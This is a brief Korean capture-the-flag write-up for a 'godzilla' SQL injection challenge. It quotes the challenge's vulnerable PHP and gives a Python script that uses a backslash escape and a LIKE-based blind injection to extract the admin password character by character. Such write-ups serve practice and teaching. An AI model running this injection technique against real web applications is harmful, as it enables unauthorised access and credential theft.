생각보다 쉽다!

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_godzilla where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello admin</h2>";
   
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_godzilla where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("godzilla");
  highlight_file(__FILE__);
?>

\\ 가 이전 문제처럼 사용 가능하였다.

또 테스트 하다보니 like 가 사용 가능하였다.

다만, like '%'는 필터링인데, like '1%2' 등은 필터링 대상이 아니었다.

소스코드

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable flag warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

headers = {'Cookie': 'PHPSESSID=##'}

password = ''
while True:
    for i in range(0x30, 0x80):
        query = password + chr(i) + '%'
        url = f"<https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php?id=\\&pw=||pw> like '{query}'-- "

        res = requests.get(url=url, headers=headers, verify=False)

        if res.text.find("<br><h2>Hello admin") != -1:
            password += chr(i)
            print("password : ", password)